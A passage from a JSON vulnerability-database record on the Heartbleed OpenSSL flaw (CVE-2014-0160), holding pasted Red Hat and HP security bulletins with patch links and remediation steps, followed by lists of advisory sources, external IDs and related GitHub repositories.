fixed (https://bugzilla.redhat.com/):\n\n857051 - CVE-2012-4929 SSL/TLS CRIME attack against HTTPS\n907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13)\n1049058 - CVE-2013-4353 openssl: client NULL dereference crash on malformed handshake packets\n1084875 - CVE-2014-0160 openssl: information disclosure in handling of TLS heartbeat extension packets\n\n6. Package List:\n\nRHEV-M 3.3:\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/RHEV/SRPMS/rhevm-spice-client-3.3-12.el6_5.src.rpm\n\nnoarch:\nrhevm-spice-client-x64-cab-3.3-12.el6_5.noarch.rpm\nrhevm-spice-client-x64-msi-3.3-12.el6_5.noarch.rpm\nrhevm-spice-client-x86-cab-3.3-12.el6_5.noarch.rpm\nrhevm-spice-client-x86-msi-3.3-12.el6_5.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2012-4929.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-0169.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4353.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0160.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n\nThe HP SIM software itself is not vulnerable to CVE-2014-0160 (\"Heartbleed\"). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04239372\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04239372\nVersion: 4\n\nHPSBMU02998 rev.4 - HP System Management Homepage (SMH) running OpenSSL on\nLinux and Windows, Remote Disclosure of Information, Denial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-04-13\nLast Updated: 2014-05-13\n\nPotential Security Impact: Remote disclosure of information, Denial of\nService (DoS)\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH) running on Linux and Windows. The vulnerabilities\ncould be exploited remotely resulting in Denial of Service (DoS). \n\nReferences:\n\nCVE-2014-0160 (SSRT101501) Disclosure of Information - \"Heartbleed\"\nCVE-2013-4353 Denial of Service (DoS)\nCVE-2013-6449 Denial of Service (DoS)\nCVE-2013-6450 Denial of Service (DoS)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\nv7.3.1 for Linux and Windows. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-4353 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2013-6449 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2013-6450 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities for the impacted versions of HP System Management Homepage\n(SMH):\n\nProduct version/Platform\n Download Location\n\nSMH 7.2.3 Windows x86\n http://www.hp.com/swpublishing/MTX-d1488fd987894bc4ab3fe0ef52\n\nSMH 7.2.3 Windows x64\n http://www.hp.com/swpublishing/MTX-4575754bbb614b58bf0ae1ac37\n\nSMH 7.3.2.1(B) Windows x86\n http://www.hp.com/swpublishing/MTX-27e03b2f9cd24e77adc9dba94a\n\nSMH 7.3.2.1(B) Windows x64\n http://www.hp.com/swpublishing/MTX-37075daeead2433cb41b59ae76\n\nSMH 7.3.2 Linux x86\n http://www.hp.com/swpublishing/MTX-3d92ccccf85f404e8ba36a8178\n\nSMH 7.3.2 Linux x64\n http://www.hp.com/swpublishing/MTX-bfd3c0fb11184796b9428ced37\n\nNotes\n\nSMH 7.2.3 recommended for customers running Windows 2003 OS\nUpdated OpenSSL to version 1.0.1g\n\nNote: If you believe your SMH installation was exploited while it was running\ncomponents vulnerable to heartbleed, there are some steps to perform after\nyouve upgraded to the non-vulnerable components. These steps include\nrevoking, recreating, and re-importing certificates and resetting passwords\nthat might have been harvested by a malicious attacker using the heartbleed\nvulnerability. \n\nImpact on VCA - VCRM communication: VCA configures VCRM by importing the SMH\ncertificate from the SMH of VCA into the SMH of VCRM. When this certificate\nis deleted \u0026 regenerated (as suggested before), it needs to be (re)imported\nif the user wants to continue with Trust by Certificate option, and the\noutdated certificate should be revoked (deleted) from each location where it\nwas previously imported. \nIf you use HPSIMs 2-way trust feature, and have imported SMH certificates\ninto HPSIM, you will also need to revoke those SMH certificated from HPSIM\nand reimport the newly created SMH certificates. \nThough SMH uses OS credentials using OS-based APIs, user provided credentials\nare passed from the client (browser) to the server (SMH) using the HTTPS\nprotocol. If you suspect your systems using SMH were exploited while they\nwere vulnerable to heartbleed, these passwords need to be reset. \n\nFrequently Asked Questions\n\nWill updated systems require a reboot after applying the SMH patch?\nNo, reboot of the system will not be required. Installing the new build is\nsufficient to get back to the normal state. \nIs a Firmware Update necessary in addition to the SMH patch?\nNo, only the SMH update is sufficient to remove the heartbleed-vulnerable\nversion of SMH. \nWill new certificates be issued along with the patch, or need to be handled\nseparately?\nIf you suspect the certificate has been compromised due to this\nvulnerability, we do recommend to delete and revoke the certificate, or SMH\nwill reuse the existing certificate. New certificate will be created when SMH\nservice starts (at the end of the fresh / upgrade installation). Instructions\non deleting the certificate are in the notes above. \nWhere can I get SMH documentation?\nAll major documents are available at:\nhttp://h17007.www1.hp.com/us/en/enterprise/servers/solutions/info-library\nSelect HP Insight Management under Product and Solutions \u0026 check HP System\nManagement Homepage to get SMH related documents. \n\nWhat are the recommended upgrade paths?\nSee the table below:\nSMH\n DVD\n SPP\n Recommended SMH update for Linux\n Recommended SMH update for Windows 2003 and Widows 2003 R2\n Recommended SMH update for other Windows OS versions\n\nv7.1.2\n v7.1.2\n 2012.10.0\n v7.3.2\n v7.2.3\n v7.3.2\n\nv7.2.0\n v7.2.0\n 2013.02.0(B)\n v7.3.2\n v7.2.3\n v7.3.2\n\nv7.2.1\n v7.2u1\n\n v7.3.2\n v7.2.3\n v7.3.2\n\nv7.2.2\n v7.2u2\n 2013.09.0(B)\n v7.3.2\n v7.2.3\n v7.3.2\n\nv7.3.0\n v7.3.0\n\n v7.3.2\n not supported\n v7.3.2\n\nv7.3.1\n v7.3.1\n 2014.02.0\n v7.3.2\n not supported\n v7.3.2\n\nHow can I verify whether my setup is patched successfully?\nSMH version can be verified by executing following command on:\nWindows: hp\\hpsmh\\bin\\smhlogreader version\nLinux: /opt/hp/hpsmh/bin/smhlogreader version\nWill VCA-VCRM communication be impacted due to the SMH certificate being\ndeleted?\nVCA configures VCRM by importing the SMH certificate (sslshare\\cert.pem) from\nthe SMH of VCA to the SMH of VCRM. When this certificate is deleted \u0026\nregenerated (as suggested before), it needs to be (re)imported if user wants\nto continue with Trust by Certificate option, and remove the old, previously\nimported certificate. \nShould I reset password on all managed nodes, where SMH was/is running?\nThough SMH uses OS credentials using OS based APIs, user-provided credentials\nare passed from the client (browser) to the server (SMH) using the HTTPS\nprotocol. Passwords need to be reset if you suspect the vulnerable version of\nSMH was exploited by malicious users/ hackers. \n\nHISTORY\nVersion:1 (rev.1) - 13 April 2014 Initial release\nVersion:2 (rev.2) - 17 April 2014 SMH 7.2.3 and 7.3.2 released\nVersion:3 (rev.3) - 30 April 2014 SMH 7.3.2.1(B) released\nVersion:4 (rev.4) - 13 May 2014 Added additional remediation steps for post\nupdate installation\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlNyLMAACgkQ4B86/C0qfVm6RQCg4JuHEt+iZq+td37hPIp27qrd\nfm4AoKM1d7+F05Xo87Bicnmh0OHidg/O\n=bK11\n-----END PGP SIGNATURE-----\n. This bulletin will give you the information needed to\nupdate your HP Insight Control server deployment solution. \n\nInstall HP Management Agents for Windows x86/x64\nInstall HP Management Agents for RHEL 5 x64\nInstall HP Management Agents for RHEL 6 x64\nInstall HP Management Agents for SLES 10 x64\nInstall HP Management Agents for SLES 11 x64\n\nReferences: CVE-2014-0160 (SSRT101538)\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP is actively working to address this vulnerability for the impacted\nversions of HP Insight Control server deployment. This bulletin may be\nrevised. It is recommended that customers take the following approaches\ndepending on the version of HP Insight Control server deployment:\n\nTo address the vulnerability in an initial installation of HP Insight Control\nserver deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2 only follow steps 1\nthrough Step 3 of the following procedure, before initiating an operating\nsystem deployment. \n\nTo address the vulnerability in a previous installation of HP Insight Control\nserver deployment v7.1.2, v7.2.0, v7.2.1, and v7.2.2 follow all steps in the\nfollowing procedure. \n\nDelete the smhamd64-*.exe/smhx86-*.exe\" from Component Copy Location listed\nin the following table, row 1,2,3,4. \nDelete the affected hpsmh-7.*.rpm\" from Component Copy Location listed in the\nfollowing table, row 5. \nIn sequence, perform the steps from left to right in the following table. \nFirst, download components from Download Link; Second, rename the component\nas suggested in Rename to. Third, copy the component to the location\nsuggested in Component Copy Location. \nTable Row Number\n Download Link\n Rename to\n Component Copy Location\n\n1\n http://www.hp.com/swpublishing/MTX-d1488fd987894bc4ab3fe0ef52\n smhx86-cp023242.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2003\n\n2\n http://www.hp.com/swpublishing/MTX-4575754bbb614b58bf0ae1ac37\n smhamd64-cp023243.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2003\n\n3\n http://www.hp.com/swpublishing/MTX-2e19c856f0e84e20a14c63ecd0\n smhamd64-cp023240.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n4\n http://www.hp.com/swpublishing/MTX-41199f68c1144acb84a5798bf0\n smhx86-cp023239.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n5\n http://www.hp.com/swpublishing/MTX-bfd3c0fb11184796b9428ced37\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\nTable 1\n\nInitiate Install HP Management Agents for SLES 11 x64 on targets running\nSLES11 x64. \nInitiate Install HP Management Agents for SLES 10 x64 on targets running\nSLES10 x64. \nInitiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL\n6 x64. \nInitiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL\n5 x64",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0160"
},
{
"db": "CERT/CC",
"id": "VU#720951"
},
{
"db": "BID",
"id": "64074"
},
{
"db": "BID",
"id": "65604"
},
{
"db": "PACKETSTORM",
"id": "126644"
},
{
"db": "PACKETSTORM",
"id": "126784"
},
{
"db": "PACKETSTORM",
"id": "127085"
},
{
"db": "PACKETSTORM",
"id": "127279"
},
{
"db": "PACKETSTORM",
"id": "126045"
},
{
"db": "PACKETSTORM",
"id": "126086"
},
{
"db": "PACKETSTORM",
"id": "126164"
},
{
"db": "PACKETSTORM",
"id": "126305"
},
{
"db": "VULMON",
"id": "CVE-2014-0160"
},
{
"db": "PACKETSTORM",
"id": "126197"
},
{
"db": "PACKETSTORM",
"id": "126361"
},
{
"db": "PACKETSTORM",
"id": "126284"
},
{
"db": "PACKETSTORM",
"id": "126954"
},
{
"db": "PACKETSTORM",
"id": "126605"
},
{
"db": "PACKETSTORM",
"id": "126417"
}
],
"trust": 3.51
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/720951",
"trust": 0.8,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=32745",
"trust": 0.4,
"type": "exploit"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#720951"
},
{
"db": "VULMON",
"id": "CVE-2014-0160"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2014-0160",
"trust": 3.9
},
{
"db": "EXPLOIT-DB",
"id": "32745",
"trust": 1.9
},
{
"db": "CERT/CC",
"id": "VU#720951",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "57721",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "59243",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "57836",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "57968",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "59347",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "57966",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "57483",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "57347",
"trust": 1.1
},
{
"db": "SECUNIA",
"id": "59139",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1030079",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1030074",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1030081",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1030080",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1030026",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1030077",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1030082",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1030078",
"trust": 1.1
},
{
"db": "BID",
"id": "66690",
"trust": 1.1
},
{
"db": "EXPLOIT-DB",
"id": "32764",
"trust": 1.1
},
{
"db": "USCERT",
"id": "TA14-098A",
"trust": 1.1
},
{
"db": "SIEMENS",
"id": "SSA-635659",
"trust": 1.1
},
{
"db": "BID",
"id": "64074",
"trust": 0.3
},
{
"db": "BID",
"id": "65604",
"trust": 0.3
},
{
"db": "ICS CERT",
"id": "ICSA-14-135-02",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2014-0160",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126605",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126954",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126284",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126361",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126197",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126417",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126305",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126644",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126164",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126086",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126045",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "127279",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "127085",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "126784",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#720951"
},
{
"db": "VULMON",
"id": "CVE-2014-0160"
},
{
"db": "BID",
"id": "64074"
},
{
"db": "BID",
"id": "65604"
},
{
"db": "PACKETSTORM",
"id": "126605"
},
{
"db": "PACKETSTORM",
"id": "126954"
},
{
"db": "PACKETSTORM",
"id": "126284"
},
{
"db": "PACKETSTORM",
"id": "126361"
},
{
"db": "PACKETSTORM",
"id": "126197"
},
{
"db": "PACKETSTORM",
"id": "126417"
},
{
"db": "PACKETSTORM",
"id": "126305"
},
{
"db": "PACKETSTORM",
"id": "126644"
},
{
"db": "PACKETSTORM",
"id": "126164"
},
{
"db": "PACKETSTORM",
"id": "126086"
},
{
"db": "PACKETSTORM",
"id": "126045"
},
{
"db": "PACKETSTORM",
"id": "127279"
},
{
"db": "PACKETSTORM",
"id": "127085"
},
{
"db": "PACKETSTORM",
"id": "126784"
},
{
"db": "NVD",
"id": "CVE-2014-0160"
}
]
},
"id": "VAR-201404-0592",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.6038711649999999
},
"last_update_date": "2026-04-10T23:34:59.841000Z",
"patch": {
"_id": null,
"data": [
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2017/01/23/heartbleed_2017/"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2014/04/24/apple_posts_updates_for_heartbleed_flaw_in_airport/"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2014/04/11/hackers_hammering_heartbleed/"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2014/04/09/heartbleed_vuln_analysis/"
},
{
"title": "Debian CVElist Bug Report Logs: CVE-2014-0160 heartbeat read overrun (heartbleed)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e4799ab8fe4804274ba2db4d65cd867b"
},
{
"title": "Debian Security Advisories: DSA-2896-1 openssl -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=264ec318be06a69e28012f62b2dc5bb7"
},
{
"title": "Ubuntu Security Notice: openssl vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2165-1"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2014-0160 "
},
{
"title": "exploits",
"trust": 0.1,
"url": "https://github.com/vs4vijay/exploits "
},
{
"title": "VULNIX",
"trust": 0.1,
"url": "https://github.com/El-Palomo/VULNIX "
},
{
"title": "openssl-heartbleed-fix",
"trust": 0.1,
"url": "https://github.com/sammyfung/openssl-heartbleed-fix "
},
{
"title": "cve-2014-0160",
"trust": 0.1,
"url": "https://github.com/cved-sources/cve-2014-0160 "
},
{
"title": "heartbleed_check",
"trust": 0.1,
"url": "https://github.com/ehoffmann-cp/heartbleed_check "
},
{
"title": "heartbleed",
"trust": 0.1,
"url": "https://github.com/okrutnik420/heartbleed "
},
{
"title": "heartbleed-test.crx",
"trust": 0.1,
"url": "https://github.com/iwaffles/heartbleed-test.crx "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Maheshmaske111/te "
},
{
"title": "AradSocket",
"trust": 0.1,
"url": "https://github.com/araditc/AradSocket "
},
{
"title": "sslscan",
"trust": 0.1,
"url": "https://github.com/kaisenlinux/sslscan "
},
{
"title": "Springboard_Capstone_Project",
"trust": 0.1,
"url": "https://github.com/jonahwinninghoff/Springboard_Capstone_Project "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/MrE-Fog/heartbleeder "
},
{
"title": "buffer_overflow_exploit",
"trust": 0.1,
"url": "https://github.com/olivamadrigal/buffer_overflow_exploit "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/ashrafulislamcs/Ubuntu-Server-Hardening "
},
{
"title": "insecure_project",
"trust": 0.1,
"url": "https://github.com/turtlesec-no/insecure_project "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Maheshmaske111/ssl "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/H4R335HR/heartbleed "
},
{
"title": "nmap-scripts",
"trust": 0.1,
"url": "https://github.com/takeshixx/nmap-scripts "
},
{
"title": "knockbleed",
"trust": 0.1,
"url": "https://github.com/siddolo/knockbleed "
},
{
"title": "heartbleed-masstest",
"trust": 0.1,
"url": "https://github.com/musalbas/heartbleed-masstest "
},
{
"title": "HeartBleedDotNet",
"trust": 0.1,
"url": "https://github.com/ShawInnes/HeartBleedDotNet "
},
{
"title": "heartbleed_test_openvpn",
"trust": 0.1,
"url": "https://github.com/weisslj/heartbleed_test_openvpn "
},
{
"title": "paraffin",
"trust": 0.1,
"url": "https://github.com/vmeurisse/paraffin "
},
{
"title": "sslscan",
"trust": 0.1,
"url": "https://github.com/rbsec/sslscan "
},
{
"title": "Heartbleed_Dockerfile_with_Nginx",
"trust": 0.1,
"url": "https://github.com/froyo75/Heartbleed_Dockerfile_with_Nginx "
},
{
"title": "heartbleed-bug",
"trust": 0.1,
"url": "https://github.com/cldme/heartbleed-bug "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/H4CK3RT3CH/awesome-web-hacking "
},
{
"title": "Web-Hacking",
"trust": 0.1,
"url": "https://github.com/adm0i/Web-Hacking "
},
{
"title": "cybersecurity-ethical-hacking",
"trust": 0.1,
"url": "https://github.com/paulveillard/cybersecurity-ethical-hacking "
},
{
"title": "Lastest-Web-Hacking-Tools-vol-I",
"trust": 0.1,
"url": "https://github.com/SARATOGAMarine/Lastest-Web-Hacking-Tools-vol-I "
},
{
"title": "HTBValentineWriteup",
"trust": 0.1,
"url": "https://github.com/zimmel15/HTBValentineWriteup "
},
{
"title": "heartbleed-poc",
"trust": 0.1,
"url": "https://github.com/sensepost/heartbleed-poc "
},
{
"title": "CVE-2014-0160",
"trust": 0.1,
"url": "https://github.com/0x90/CVE-2014-0160 "
},
{
"title": "Certified-Ethical-Hacker-Exam-CEH-v10",
"trust": 0.1,
"url": "https://github.com/Tung0801/Certified-Ethical-Hacker-Exam-CEH-v10 "
},
{
"title": "cs558heartbleed",
"trust": 0.1,
"url": "https://github.com/gkaptch1/cs558heartbleed "
},
{
"title": "HeartBleed",
"trust": 0.1,
"url": "https://github.com/archaic-magnon/HeartBleed "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/undacmic/heartbleed-proof-of-concept "
},
{
"title": "openvpn-jookk",
"trust": 0.1,
"url": "https://github.com/Jeypi04/openvpn-jookk "
},
{
"title": "Heartbleed",
"trust": 0.1,
"url": "https://github.com/Saiprasad16/Heartbleed "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/KickFootCode/LoveYouALL "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/imesecan/LeakReducer-artifacts "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/TVernet/Kali-Tools-liste-et-description "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/k4u5h41/Heartbleed "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/ronaldogdm/Heartbleed "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/rochacbruno/my-awesome-stars "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/asadhasan73/temp_comp_sec "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Aakaashzz/Heartbleed "
},
{
"title": "tls-channel",
"trust": 0.1,
"url": "https://github.com/marianobarrios/tls-channel "
},
{
"title": "fuzzx_cpp_demo",
"trust": 0.1,
"url": "https://github.com/guardstrikelab/fuzzx_cpp_demo "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Ppamo/recon_net_tools "
},
{
"title": "heatbleeding",
"trust": 0.1,
"url": "https://github.com/idkqh7/heatbleeding "
},
{
"title": "HeartBleed-Vulnerability-Checker",
"trust": 0.1,
"url": "https://github.com/waqasjamal/HeartBleed-Vulnerability-Checker "
},
{
"title": "heartbleed",
"trust": 0.1,
"url": "https://github.com/iSCInc/heartbleed "
},
{
"title": "heartbleed-dtls",
"trust": 0.1,
"url": "https://github.com/hreese/heartbleed-dtls "
},
{
"title": "heartbleedchecker",
"trust": 0.1,
"url": "https://github.com/roganartu/heartbleedchecker "
},
{
"title": "nmap-heartbleed",
"trust": 0.1,
"url": "https://github.com/azet/nmap-heartbleed "
},
{
"title": "sslscan",
"trust": 0.1,
"url": "https://github.com/delishen/sslscan "
},
{
"title": "web-hacking",
"trust": 0.1,
"url": "https://github.com/hr-beast/web-hacking "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Miss-Brain/Web-Application-Security "
},
{
"title": "web-hacking",
"trust": 0.1,
"url": "https://github.com/Hemanthraju02/web-hacking "
},
{
"title": "awesome-web-hacking",
"trust": 0.1,
"url": "https://github.com/QWERTSKIHACK/awesome-web-hacking "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/himera25/web-hacking-list "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/dorota-fiit/bp-Heartbleed-defense-game "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Maheshmaske111/sslscan "
},
{
"title": "Heart-bleed",
"trust": 0.1,
"url": "https://github.com/anonymouse327311/Heart-bleed "
},
{
"title": "goScan",
"trust": 0.1,
"url": "https://github.com/stackviolator/goScan "
},
{
"title": "sec-tool-list",
"trust": 0.1,
"url": "https://github.com/alphaSeclab/sec-tool-list "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/utensil/awesome-stars-test "
},
{
"title": "insecure-cplusplus-dojo",
"trust": 0.1,
"url": "https://github.com/patricia-gallardo/insecure-cplusplus-dojo "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/jubalh/awesome-package-maintainer "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Elnatty/tryhackme_labs "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/hzuiw33/OpenSSL "
},
{
"title": "makeItBleed",
"trust": 0.1,
"url": "https://github.com/mcampa/makeItBleed "
},
{
"title": "CVE-2014-0160-Chrome-Plugin",
"trust": 0.1,
"url": "https://github.com/Xyl2k/CVE-2014-0160-Chrome-Plugin "
},
{
"title": "heartbleedfixer.com",
"trust": 0.1,
"url": "https://github.com/reenhanced/heartbleedfixer.com "
},
{
"title": "CVE-2014-0160-Scanner",
"trust": 0.1,
"url": "https://github.com/obayesshelton/CVE-2014-0160-Scanner "
},
{
"title": "openmagic",
"trust": 0.1,
"url": "https://github.com/isgroup-srl/openmagic "
},
{
"title": "heartbleeder",
"trust": 0.1,
"url": "https://github.com/titanous/heartbleeder "
},
{
"title": "cardiac-arrest",
"trust": 0.1,
"url": "https://github.com/ah8r/cardiac-arrest "
},
{
"title": "heartbleed_openvpn_poc",
"trust": 0.1,
"url": "https://github.com/tam7t/heartbleed_openvpn_poc "
},
{
"title": "docker-wheezy-with-heartbleed",
"trust": 0.1,
"url": "https://github.com/simonswine/docker-wheezy-with-heartbleed "
},
{
"title": "docker-testssl",
"trust": 0.1,
"url": "https://github.com/mbentley/docker-testssl "
},
{
"title": "heartbleedscanner",
"trust": 0.1,
"url": "https://github.com/hybridus/heartbleedscanner "
},
{
"title": "HeartLeak",
"trust": 0.1,
"url": "https://github.com/OffensivePython/HeartLeak "
},
{
"title": "HBL",
"trust": 0.1,
"url": "https://github.com/ssc-oscar/HBL "
},
{
"title": "awesome-stars",
"trust": 0.1,
"url": "https://github.com/utensil/awesome-stars "
},
{
"title": "SecurityTesting_web-hacking",
"trust": 0.1,
"url": "https://github.com/mostakimur/SecurityTesting_web-hacking "
},
{
"title": "awesome-web-hacking",
"trust": 0.1,
"url": "https://github.com/winterwolf32/awesome-web-hacking "
},
{
"title": "awesome-web-hacking-1",
"trust": 0.1,
"url": "https://github.com/winterwolf32/awesome-web-hacking-1 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Mehedi-Babu/ethical_hacking_cyber "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/drakyanerlanggarizkiwardhana/awesome-web-hacking "
},
{
